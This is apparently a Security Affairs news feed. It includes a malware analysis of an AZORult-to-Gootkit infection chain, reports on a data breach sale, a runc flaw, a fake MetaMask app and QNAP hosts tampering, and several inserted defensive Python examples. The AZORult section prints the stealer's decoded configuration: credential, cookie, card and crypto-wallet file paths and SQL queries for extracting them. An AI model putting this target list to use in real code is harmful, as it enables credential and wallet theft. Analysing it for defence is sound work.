Security Affairs

Gootkit: Unveiling the Hidden Link with AZORult

Cybaze-Yoroi ZLAB revealed interesting a hidden connection between the AZORult toolkit and specific Gootkit payload.

Introduction

In the last days, a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkitpayload.

Technical analysis

Stage 1 – The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet archive encoded within the chunk of executable JavaScript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.

As shown in Figure 3, the first characters of the encoded payload string are “TVNDRg”, which base64-decodes to “MSCF”: the standard header of the Microsoft Cabinet compressed file format.

Figure 4: JavaScript downloaded from the driverconnectsearch[.]info server.
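The “TVNDRg” prefix is a cheap but reliable tell: it is the base64 encoding of the CAB magic “MSCF”. The following Python is an added example, not code from the Cybaze-Yoroi analysis, that scans a captured script body for base64 runs, decodes the candidates and validates them against the 36-byte CFHEADER layout of the Microsoft Cabinet format before reporting them. The sample script body and the CAB header embedded in it are constructed here for the demonstration; the field names follow the public CFHEADER layout.

```python
import base64
import re
import struct

# A base64 run long enough to hold at least a CFHEADER (36 bytes -> 48 chars).
_B64_RUN = re.compile(r"[A-Za-z0-9+/]{48,}={0,2}")

CAB_MAGIC = b"MSCF"                            # base64-encodes to "TVNDRg", the prefix in Figure 3
CFHEADER = struct.Struct("<4sIIIIIBBHHHHH")    # signature .. iCabinet, 36 bytes in total


def parse_cab_header(blob):
    """Return the CFHEADER fields of a CAB blob, or None if it is not one."""
    if len(blob) < CFHEADER.size or not blob.startswith(CAB_MAGIC):
        return None
    (_sig, _res1, cb_cabinet, _res2, coff_files, _res3, ver_minor, ver_major,
     c_folders, c_files, flags, set_id, _i_cabinet) = CFHEADER.unpack_from(blob)
    return {"size": cb_cabinet, "files_offset": coff_files,
            "version": f"{ver_major}.{ver_minor}", "folders": c_folders,
            "files": c_files, "flags": flags, "set_id": set_id}


def find_embedded_cabs(script_text):
    """Locate base64 runs in a script body that decode to a Cabinet archive."""
    hits = []
    for m in _B64_RUN.finditer(script_text):
        run = m.group(0)
        if not run.startswith("TVNDRg"):       # cheap pre-filter on the encoded magic
            continue
        padded = run + "=" * (-len(run) % 4)   # repair stripped padding
        try:
            blob = base64.b64decode(padded, validate=True)
        except ValueError:                     # binascii.Error is a ValueError subclass
            continue
        header = parse_cab_header(blob)
        if header is not None:
            hits.append((m.start(), header))
    return hits


def constructed_cab(size=1234, files=1):
    """A minimal CFHEADER plus zero padding, constructed for this demo (not a real archive)."""
    hdr = CFHEADER.pack(CAB_MAGIC, 0, size, 0, 44, 0, 3, 1, 1, files, 0, 0x1234, 0)
    return hdr + b"\x00" * max(0, size - len(hdr))


# Constructed stand-in for the JavaScript returned by the second server: one string
# carries the archive, the other is ordinary base64 that must not be reported.
SAMPLE_SCRIPT = ('var a = "' + base64.b64encode(constructed_cab()).decode() + '";\n'
                 'var b = "' + base64.b64encode(b"just a harmless string of text").decode() + '";\n')

if __name__ == "__main__":
    for offset, header in find_embedded_cabs(SAMPLE_SCRIPT):
        print(f"CAB at offset {offset}: {header}")
```

The header check matters more than the prefix: any base64 string starting with “MSCF” text would match the prefix, but only a blob whose declared version, folder and file counts parse cleanly is worth raising as an embedded archive.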

Stage 2 – The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file: 

Hash: 2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
Threat: RuntimeBroker5.exe
Description: First component downloaded by the malicious JS file.

Table 2: Generic information about RuntimeBroker5.exe (AZORult)

When executed, the RuntimeBroker5.exe sample seems to behave as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample does not perform only this download. Here is one of the key points of the article: it also establishes a communication channel with the AZORult C2 host “ssl[.]admin[.]itybuy[.]it”.

The network packets exchanged with the server confirm this identification, due to the known communication patterns, and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the files written in the “%APPDATA%\Local\Temp\” path closely match the AZORult analysis described by the Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

  1. firefox.exe
  2. SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
  3. SOFTWARE\Mozilla\Mozilla Firefox
  4. SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
  5. SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
  6. %appdata%\Mozilla\Firefox\Profiles\
  7. MozillaFireFox
  8. CurrentVersion
  9. Install_Directory
  10. nss3.dll
  11. thunderbird.exe
  12. SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
  13. SOFTWARE\Mozilla\Mozilla Thunderbird
  14. SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
  15. %appdata%\Thunderbird\Profiles\
  16. ThunderBird
  17. SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
  18. SELECT fieldname, value FROM moz_formhistory
  19. NSS_Init
  20. PK11_GetInternalKeySlot
  21. PK11_Authenticate
  22. PK11SDR_Decrypt
  23. NSS_Shutdown
  24. PK11_FreeSlot
  25. logins.json
  26. logins
  27. hostname
  28. timesUsed
  29. encryptedUsername
  30. encryptedPassword
  31. cookies.sqlite
  32. formhistory.sqlite
  33. %LOCALAPPDATA%\Google\Chrome\User Data\
  34. %LOCALAPPDATA%\Google\Chrome SxS\User Data\
  35. %LOCALAPPDATA%\Xpom\User Data\
  36. %LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
  37. %LOCALAPPDATA%\Comodo\Dragon\User Data\
  38. %LOCALAPPDATA%\Amigo\User Data\
  39. %LOCALAPPDATA%\Orbitum\User Data\
  40. %LOCALAPPDATA%\Bromium\User Data\
  41. %LOCALAPPDATA%\Chromium\User Data\
  42. %LOCALAPPDATA%\Nichrome\User Data\
  43. %LOCALAPPDATA%\RockMelt\User Data\
  44. %LOCALAPPDATA%\360Browser\Browser\User Data\
  45. %LOCALAPPDATA%\Vivaldi\User Data\
  46. %APPDATA%\Opera Software\
  47. %LOCALAPPDATA%\Go!\User Data\
  48. %LOCALAPPDATA%\Sputnik\Sputnik\User Data\
  49. %LOCALAPPDATA%\Kometa\User Data\
  50. %LOCALAPPDATA%\uCozMedia\Uran\User Data\
  51. %LOCALAPPDATA%\QIP Surf\User Data\
  52. %LOCALAPPDATA%\Epic Privacy Browser\User Data\
  53. %APPDATA%\brave\
  54. %LOCALAPPDATA%\CocCoc\Browser\User Data\
  55. %LOCALAPPDATA%\CentBrowser\User Data\
  56. %LOCALAPPDATA%\7Star\7Star\User Data\
  57. %LOCALAPPDATA%\Elements Browser\User Data\
  58. %LOCALAPPDATA%\TorBro\Profile\
  59. %LOCALAPPDATA%\Suhba\User Data\
  60. %LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
  61. %LOCALAPPDATA%\Rafotech\Mustang\User Data\
  62. %LOCALAPPDATA%\Superbird\User Data\
  63. %LOCALAPPDATA%\Chedot\User Data\
  64. %LOCALAPPDATA%\Torch\User Data\
  65. GoogleChrome
  66. GoogleChrome64
  67. InternetMailRu
  68. YandexBrowser
  69. ComodoDragon
  70. Amigo
  71. Orbitum
  72. Bromium
  73. Chromium
  74. Nichrome
  75. RockMelt
  76. 360Browser
  77. Vivaldi
  78. Opera
  79. GoBrowser
  80. Sputnik
  81. Kometa
  82. Uran
  83. QIPSurf
  84. Epic
  85. Brave
  86. CocCoc
  87. CentBrowser
  88. 7Star
  89. ElementsBrowser
  90. TorBro
  91. Suhba
  92. SaferBrowser
  93. Mustang
  94. Superbird
  95. Chedot
  96. Torch
  97. Login Data
  98. Web Data
  99. SELECT origin_url, username_value, password_value FROM logins
  100. SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
  101. SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
  102. SELECT name, value FROM autofill
  103. SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
  104. %APPDATA%\Microsoft\Windows\Cookies\
  105. %APPDATA%\Microsoft\Windows\Cookies\Low\
  106. %LOCALAPPDATA%\Microsoft\Windows\INetCache\
  107. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
  108. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
  109. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
  110. %LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
  111. InternetExplorer
  112. InternetExplorerLow
  113. InternetExplorerINetCache
  114. MicrosoftEdge_AC_INetCookies
  115. MicrosoftEdge_AC_001
  116. MicrosoftEdge_AC_002
  117. MicrosoftEdge_AC
  118. Software\Microsoft\Internet Explorer
  119. Software\Microsoft\Internet Explorer\IntelliForms\Storage2
  120. Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
  121. Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  122. Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
  123. POP3
  124. IMAP
  125. SMTP
  126. HTTP
  127. %appdata%\Waterfox\Profiles\
  128. Waterfox
  129. %appdata%\Comodo\IceDragon\Profiles\
  130. IceDragon
  131. %appdata%\8pecxstudios\Cyberfox\Profiles\
  132. Cyberfox
  133. sqlite3_open
  134. sqlite3_close
  135. sqlite3_prepare_v2
  136. sqlite3_step
  137. sqlite3_column_text
  138. sqlite3_column_bytes
  139. sqlite3_finalize
  140. %APPDATA%\filezilla\recentservers.xml
  141. <RecentServers>
  142. </RecentServers>
  143. <Server>
  144. </Server>
  145. <Host>
  146. </Host>
  147. <Port>
  148. </Port>
  149. <User>
  150. </User>
  151. <Pass>
  152. </Pass>
  153. <Pass encoding="base64">
  154. FileZilla
  155. ole32.dll
  156. CLSIDFromString
  157. {4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
  158. {3CCD5499-87A8-4B10-A215-608888DD3B55}
  159. vaultcli.dll
  160. VaultOpenVault
  161. VaultEnumerateItems
  162. VaultGetItem
  163. MicrosoftEdge
  164. Browsers\AutoComplete
  165. CookieList.txt
  166. SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
  167. %appdata%\Moonchild Productions\Pale Moon\Profiles\
  168. PaleMoon
  169. %appdata%\Electrum\wallets\
  170. \Electrum
  171. %appdata%\Electrum-LTC\wallets\
  172. \Electrum-LTC
  173. %appdata%\ElectrumG\wallets\
  174. \ElectrumG
  175. %appdata%\Electrum-btcp\wallets\
  176. \Electrum-btcp
  177. %APPDATA%\Ethereum\keystore\
  178. \Ethereum
  179. %APPDATA%\Exodus\
  180. \Exodus
  181. \Exodus Eden
  182. *.json,*.seco
  183. %APPDATA%\Jaxx\Local Storage\
  184. \Jaxx\Local Storage\
  185. %APPDATA%\MultiBitHD\
  186. \MultiBitHD
  187. mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
  188. .wallet
  189. wallets\.wallet
  190. wallet.dat
  191. wallets\wallet.dat
  192. electrum.dat
  193. wallets\electrum.dat
  194. Software\monero-project\monero-core
  195. wallet_path
  196. Bitcoin\Bitcoin-Qt
  197. BitcoinGold\BitcoinGold-Qt
  198. BitCore\BitCore-Qt
  199. Litecoin\Litecoin-Qt
  200. BitcoinABC\BitcoinABC-Qt
  201. %APPDATA%\Exodus Eden\
  202. %Appdata%\Psi+\profiles\
  203. %Appdata%\Psi\profiles\
  204. <roster-cache>
  205. </roster-cache>
  206. <jid type="QString">
  207. <password type="QString">
  208. </password>

Table 3: AZORult Configuration file

The multiple references to browser cookies and cryptocurrency wallets confirm that the “RuntimeBroker5.exe” sample, initially hidden inside the cabinet archive, is an AZORult variant.

Stage 3 – The Payload

The other file downloaded from hairpd[.]com by the AZORult sample is another PE32 executable.

Figure 8: GET request to download the payload.

Hash: a75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threat: sputik.exe
Description: Second component downloaded by the malware. This component stays alive after the infection.

Table 4: Generic information about sputik.exe (Gootkit)

The “sputik.exe” sample uses a set of evasion techniques to avoid process monitoring, such as invoking the “UuidCreateSequential” API to detect the MAC address prefixes typically used by virtual machines; this technique, however, can be easily bypassed by spoofing the MAC address of a real network card.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant includes several modules written on top of NodeJS and embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In past years, the Gootkit source code has been leaked online and part of it is also available on the GitHub platform. This allowed us to investigate the differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As a general consideration, we noticed many similarities between the two code bases: they are perfectly compatible, but a few differences remain. For instance, private keys and certificates have been modified, showing that the malware author chose a stronger key.

Table 5:  Certificate comparison 
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting Italian organizations and users revealed interesting connections between two threats we were used to monitoring and detecting across both the InfoSec community and the CERT-Yoroi constituency, revealing a hidden link connecting this particular AZORult instance with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used by cyber-criminals in the initial stages of the attacks, showing how the use of extremely flexible stagers written in high-level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published on the Yoroi Blog.

Pierluigi Paganini

(SecurityAffairs – AZORult, gootkit)

The post Gootkit: Unveiling the Hidden Link with AZORult appeared first on Security Affairs.

620 million accounts stolen from 16 hacked websites available for sale on the dark web

620 million accounts stolen from 16 hacked websites (Dubsmash, Armor Games, 500px, Whitepages, ShareThis) available for sale on the dark web

The Register revealed in an exclusive that some 617 million online account details stolen from 16 hacked websites are available for sale on the dark web.

The advertisement for the sale of the huge trove of data was published on the popular Dream Market black marketplace; the data are available for less than $20,000 worth of Bitcoin.

Data was collected from data breaches of popular websites including:

  • Dubsmash (162 million);
  • MyFitnessPal (151 million);
  • MyHeritage (92 million);
  • ShareThis (41 million);
  • HauteLook (28 million);
  • Animoto (25 million);
  • EyeEm (22 million);
  • 8fit (20 million);
  • Whitepages (18 million);
  • Fotolog (16 million);
  • 500px (15 million);
  • Armor Games (11 million);
  • BookMate (8 million);
  • CoffeeMeetsBagel (6 million);
  • Artsy (1 million);
  • DataCamp (700,000).

While some of the above websites were already known to have been hacked (i.e. MyHeritage, MyFitnessPal), for others this is the first time the security community has been informed of their breaches.

Journalists at The Register have analyzed account records and confirmed they appear to be legitimate. Spokespersons for MyHeritage and 500px confirmed the authenticity of the data.

Most of the data included in the dump consist of account holder names, email addresses, and hashed passwords (in some cases the passwords are hashed with the MD5 algorithm, which makes them easy for hackers to crack).

Journalists pointed out that, depending on the specific website, the archives contain other information, including location, personal details, and social media authentication tokens. The data doesn’t include financial information.

The information could be used by threat actors to target users of hacked websites and conduct several malicious activities.

“All of the databases are right now being touted separately by one hacker, who says he or she typically exploited security vulnerabilities within web apps to gain remote-code execution and then extract user account data.” states the post published by The Register. “The records were swiped mostly during 2018, we’re told, and went on sale this week.”

The journalists confirmed they received information that the Dubsmash data has been purchased by at least one individual.

The seller seems to be located outside of the US; in at least one case he attempted to blackmail the owner of a website, asking for money to avoid the sale of the data.

The seller told The Register that he has stolen roughly a billion accounts from servers since he started hacking in 2012.

“I don’t think I am deeply evil,” the seller told The Register. “I need the money. I need the leaks to be disclosed.”

“Security is just an illusion. I started hacking a long time ago. I’m just a tool used by the system. We all know measures are taken to prevent cyber attacks, but with these upcoming dumps, I’ll make hacking easier than ever.”

Pierluigi Paganini

(SecurityAffairs – dark web, hacking)

The post 620 million accounts stolen from 16 hacked websites available for sale on the dark web appeared first on Security Affairs.

Docker runc flaw opens the door to a ‘Doomsday scenario’

Security experts found a serious flaw, tracked as CVE-2019-5736, affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.

Aleksa Sarai, a senior software engineer at SUSE Linux GmbH, has disclosed a serious vulnerability, tracked as CVE-2019-5736, affecting runc, the default container runtime for Docker, containerd, Podman, and CRI-O.

The vulnerability was discovered by the security researchers Adam Iwaniuk and Borys Popławski.

Vulnerabilities of this kind can have a significant impact on an IT environment: their exploitation could potentially escape containment, impacting the entire container host and ultimately compromising the hundreds to thousands of other containers running on it.

“The disclosure of a security flaw (CVE-2019-5736) in runc and docker illustrates a bad scenario for many IT administrators, managers, and CxOs.” reads a blog post published by Red Hat.

“While there are very few incidents that could qualify as a doomsday scenario for enterprise IT, a cascading set of exploits affecting a wide range of interconnected production systems qualifies…and that’s exactly what this vulnerability represents,”

“The vulnerability allows a malicious container to (with minimal user interaction) overwrite the host runc binary and thus gain root-level code execution on the host.” Sarai wrote in a post to the OpenWall mailing list.

“The level of user interaction is being able to run any command (it doesn’t matter if the command is not attacker-controlled) as root within a container in either of these contexts:

  • Creating a new container using an attacker-controlled image.
  • Attaching (docker exec) into an existing container which the attacker had previous write access to.”

Sarai, who is one of the maintainers of runc, has pushed a git commit to address the vulnerability, but all the projects built on runc need to include the changes.

Docker released the v18.09.2 version to address the issue, but according to the experts, thousands of Docker daemons exposed online are still vulnerable, most of them in the US and China.


Default configurations of Red Hat Enterprise Linux and Red Hat OpenShift are protected; the Linux distros Debian and Ubuntu are working to address the issue. Both Google Cloud and AWS published security advisories recommending that customers update containers on affected services.
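A practical first check against the 18.09.2 release named above, as an added example that is neither Docker’s nor the article’s code: the version parser, the comparison and the helper that asks a local docker CLI for the daemon version are this example’s own assumptions, and the only fixed release it knows about is the one the article mentions.

```python
import re
import shutil
import subprocess

FIXED_DOCKER_ENGINE = "18.09.2"   # the fixed release named in the article


def parse_version(text):
    """'18.09.2', 'v18.09.2-ce' or '19.03.5+azure' -> (18, 9, 2), a comparable tuple."""
    core = text.strip().lstrip("v").split("-", 1)[0].split("+", 1)[0]
    return tuple(int(re.sub(r"\D", "", part) or 0) for part in core.split("."))


def engine_is_patched(version, fixed=FIXED_DOCKER_ENGINE):
    """True when the engine is at or above the fixed release. Only the release named
    on the page is known here, so an older maintenance branch that received a
    backport is reported as unpatched; confirm a negative against the vendor advisory."""
    return parse_version(version) >= parse_version(fixed)


def local_engine_version():
    """Daemon version from a locally installed docker CLI, or None when unavailable."""
    if shutil.which("docker") is None:
        return None
    try:
        proc = subprocess.run(["docker", "version", "--format", "{{.Server.Version}}"],
                              capture_output=True, text=True, timeout=10, check=True)
    except (subprocess.SubprocessError, OSError):
        return None
    return proc.stdout.strip() or None


if __name__ == "__main__":
    v = local_engine_version()
    if v is None:
        print("docker daemon not reachable")
    else:
        state = "at or above" if engine_is_patched(v) else "below"
        print(f"engine {v}: {state} {FIXED_DOCKER_ENGINE}")
```

The daemon version, not the CLI version, is the one that matters, which is why the helper asks for the Server field; an engine reported as below the fixed release still runs the vulnerable runc even if the client binary was updated.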

Pierluigi Paganini

(SecurityAffairs – runc, hacking)


The post Docker runc flaw opens the door to a ‘Doomsday scenario’ appeared first on Security Affairs.

MetaMask app on Google Play was a Clipboard Hijacker

Security researcher Lukas Stefanko from ESET discovered the first Android cryptocurrency clipboard hijacker impersonating MetaMask on the official Google Play store.

The rogue MetaMask app is a clipboard hijacker that monitors a device’s clipboard for Bitcoin and Ethereum addresses and replaces them with addresses of wallets under the control of the attacker. Using this trick the attackers can transfer funds to their wallets.

“This dangerous form of malware first made its rounds in 2017 on the Windows platform and was spotted in shady Android app stores in the summer of 2018. In February 2019, we discovered a malicious clipper on Google Play, the official Android app store.” reads the post published by ESET.

The clipboard hijacker poses as a mobile version of the legitimate service MetaMask.io, which is designed to run Ethereum decentralized apps in a browser without having to run a full Ethereum node.

However, the legitimate service currently does not offer a mobile app.

Lukas Stefanko discovered that the app was able to steal cryptocurrency using two different attack methods.

The first attack scenario sees attackers using the app to steal the private keys and seeds of an Ethereum wallet when a user adds it to the app. Once obtained, this data is sent to a Telegram account.

The second attack scenario sees attackers monitoring the clipboard for Ethereum and Bitcoin addresses and, when one is detected, replacing it with the attackers’ address.

In June 2017, security researchers from Qihoo 360 Total Security spotted a new malware campaign spreading a clipboard hijacker, tracked as ClipboardWalletHijacker, that infected over 300,000 computers. Most of the victims were located in Asia, mainly China.

In July 2017, a cryptocurrency clipboard hijacker that monitored more than 2.3 million addresses was discovered by BleepingComputer.

In March 2018, security researchers at Palo Alto Networks spotted a strain of malware dubbed ComboJack that is able to detect when users copy a cryptocurrency address to the Windows clipboard. The malicious code then replaces the address in the clipboard with the author’s one.

Pierluigi Paganini

(SecurityAffairs – Clipboard Hijacker, MetaMask)

The post MetaMask app on Google Play was a Clipboard Hijacker appeared first on Security Affairs.

A mysterious code prevents QNAP NAS devices to be updated

Users of QNAP NAS devices are reporting, through QNAP forum discussions, a mysterious code that adds some entries preventing software updates.

Users of the network attached storage devices manufactured by QNAP have reported a mysterious string of malware attacks that disabled software updates by hijacking entries in the host machines’ hosts file.

According to the users, the malicious code adds some 700 entries to the /etc/hosts file that redirect requests to the IP address 0.0.0.0.

The user ianch99 in the QNAP NAS community forum reported that the antivirus ClamAV was failing to update due to 0.0.0.0 clamav.net hosts file entries.

“Since recent firmware updates, the ClamAV Antivirus fails to update due to 700+ clamav.net entries in /etc/hosts, all set to 0.0.0.0 e.g.” wrote the user ianch99.

“0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 db.local.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 db.ac.clamav.net
0.0.0.0 db.ac.ipv6.clamav.net
0.0.0.0 db.ac.big.clamav.net
<snip>

As they are all set to 0.0.0.0, the ClamAV update fails. If you remove these entries, the update runs fine but they return on after rebooting.”

Other users reported similar problems with the MalwareRemover, but it is still unclear if the events are linked.

QNAP provided a script that could help users restore normal operations by deleting the mysterious entries.

QNAP hasn’t confirmed that the incidents were caused by malware.
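An added example, not QNAP’s script, of how the symptom ianch99 describes can be found and undone from a copy of /etc/hosts: 0.0.0.0 entries are counted per parent domain, since hundreds of sinkhole entries against a single vendor domain such as clamav.net are the tell, and the matching entries can then be stripped. The sample hosts content, the grouping rule and the threshold are constructed for this demonstration.

```python
from collections import Counter

SINKHOLE_IP = "0.0.0.0"

# Constructed hosts file: legitimate entries, the burst ianch99 describes, and one
# unrelated 0.0.0.0 entry a user might have added on purpose.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost
192.168.1.10 nas.lan   # constructed LAN entry
0.0.0.0 bugs.clamav.net
0.0.0.0 current.cvd.clamav.net
0.0.0.0 database.clamav.net
0.0.0.0 db.local.clamav.net
0.0.0.0 update.nai.com
0.0.0.0 ads.example   # constructed: the user's own ad-block entry
"""


def parse_hosts(text):
    """Yield (lineno, ip, [hostnames]) for every entry line; comments are dropped."""
    for n, line in enumerate(text.splitlines(), 1):
        fields = line.split("#", 1)[0].split()
        if fields:
            yield n, fields[0], fields[1:]


def sinkholed_hosts(text):
    """Every hostname pinned to 0.0.0.0, as (lineno, hostname) pairs."""
    return [(n, h) for n, ip, names in parse_hosts(text) if ip == SINKHOLE_IP for h in names]


def parent_domain(host):
    """Crude last-two-labels grouping; enough to collapse *.clamav.net into one bucket."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def sinkhole_summary(text):
    """0.0.0.0 entries per parent domain: a burst against one vendor domain is the tell."""
    return Counter(parent_domain(h) for _, h in sinkholed_hosts(text))


def suspicious_domains(text, threshold=3):
    """Parent domains with at least `threshold` sinkholed names (threshold is this example's choice)."""
    return {d for d, c in sinkhole_summary(text).items() if c >= threshold}


def strip_sinkholes(text, domains):
    """Return the hosts content with 0.0.0.0 lines for the given parent domains removed."""
    kept = []
    for line in text.splitlines():
        fields = line.split("#", 1)[0].split()
        if fields and fields[0] == SINKHOLE_IP and any(parent_domain(h) in domains for h in fields[1:]):
            continue
        kept.append(line)
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    print(sinkhole_summary(SAMPLE_HOSTS))
    print(strip_sinkholes(SAMPLE_HOSTS, suspicious_domains(SAMPLE_HOSTS)))
```

The thread notes the entries come back after a reboot, so stripping them is only a stopgap; the per-domain count is the thing to alert on, and a re-appearing count after a clean pass is the evidence that something on the device still writes the file.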

“Exposing your NAS on the internet (allowing remote access) is always a high risk thing to do (at least without a properly deployed remote access VPN and/or 2FA on all existing user accounts)!” wrote the user P3R.

“The real problems that I see with Qnap are:

  • The marketing is pushing the private cloud message and tells users that the Qnap solution is a secure way to deploy it. Unfortunately the first part is very attractive to users that don’t understand the risks and the last part is a lie.
  • Qnap have many dangerous things enabled by default and/or without sufficient warnings about the risks.”

Pierluigi Paganini

(SecurityAffairs – NAS, hacking)

The post A mysterious code prevents QNAP NAS devices to be updated appeared first on Security Affairs.

Adiantum will bring encryption on Android devices without cryptographic acceleration

Google announced Adiantum, a new encryption method devised to protect Android devices without cryptographic acceleration.

Google announced Adiantum, a new encryption method devised to protect Android devices without cryptographic acceleration.

“Adiantum is an innovation in cryptography designed to make storage encryption more efficient for devices without cryptographic acceleration, to ensure that all devices can be encrypted.” reads the announcement published by Google.

Since Android version 6.0, user data have been protected with Advanced Encryption Standard (AES) encryption; however, the feature is slow on mobile devices using low-end processors that lack hardware support for it.

The new encryption mode has been created for devices running Android 9 and higher whose processors don’t support AES CPU instructions.

For this reason, Google developed Adiantum, which uses the ChaCha stream cipher in a length-preserving mode. ChaCha allows improving security and performance in the absence of dedicated hardware acceleration.

Google experts pointed out that Adiantum encryption/decryption processes on ARM Cortex-A7 processors are around five times faster compared to AES-256-XTS.


“Unlike modes such as XTS or CBC-ESSIV, Adiantum is a true wide-block mode: changing any bit anywhere in the plaintext will unrecognizably change all of the ciphertext, and vice versa.  It works by first hashing almost the entire plaintext,” continues Google.

“We also hash a value called the “tweak” which is used to ensure that different sectors are encrypted differently. This hash is then used to generate a nonce for the ChaCha encryption. After encryption, we hash again, so that we have the same strength in the decryption direction as the encryption direction”  
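The quoted description is the hash-encrypt-hash shape. The Python below is an added toy rendering of that shape, not Google’s Adiantum code and not interoperable with it: it uses a from-scratch RFC 8439 ChaCha20 for the stream cipher, and stand-ins of this example’s own choosing where Adiantum uses other components (keyed BLAKE2s in place of the NH/Poly1305 hash, a small BLAKE2s-based Feistel permutation in place of the single AES block call, and the 16-byte middle value split into ChaCha’s counter and nonce). It demonstrates the structure and the “any bit changes everything” property the quote claims, not Adiantum’s actual security level.

```python
import hashlib
import struct

MASK32, MASK64, MASK128 = (1 << 32) - 1, (1 << 64) - 1, (1 << 128) - 1


def _rotl32(v, c):
    return ((v << c) & MASK32) | (v >> (32 - c))


def _qr(s, a, b, c, d):
    """RFC 8439 quarter round on four words of the state."""
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 16)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 12)
    s[a] = (s[a] + s[b]) & MASK32; s[d] = _rotl32(s[d] ^ s[a], 8)
    s[c] = (s[c] + s[d]) & MASK32; s[b] = _rotl32(s[b] ^ s[c], 7)


def chacha20_block(key, counter, nonce):
    """ChaCha20 block function: 32-byte key, 32-bit counter, 12-byte nonce -> 64 bytes."""
    init = list(struct.unpack("<16I", b"expand 32-byte k" + key + struct.pack("<I", counter) + nonce))
    s = init[:]
    for _ in range(10):                                   # 20 rounds as 10 double rounds
        _qr(s, 0, 4, 8, 12); _qr(s, 1, 5, 9, 13); _qr(s, 2, 6, 10, 14); _qr(s, 3, 7, 11, 15)
        _qr(s, 0, 5, 10, 15); _qr(s, 1, 6, 11, 12); _qr(s, 2, 7, 8, 13); _qr(s, 3, 4, 9, 14)
    return struct.pack("<16I", *[(x + y) & MASK32 for x, y in zip(s, init)])


def chacha20_xor(key, counter, nonce, data):
    """XOR data with the ChaCha20 keystream starting at the given block counter."""
    out = bytearray()
    for off in range(0, len(data), 64):
        ks = chacha20_block(key, (counter + off // 64) & MASK32, nonce)
        out += bytes(x ^ y for x, y in zip(data[off:off + 64], ks))
    return bytes(out)


def _h128(hkey, tweak, data):
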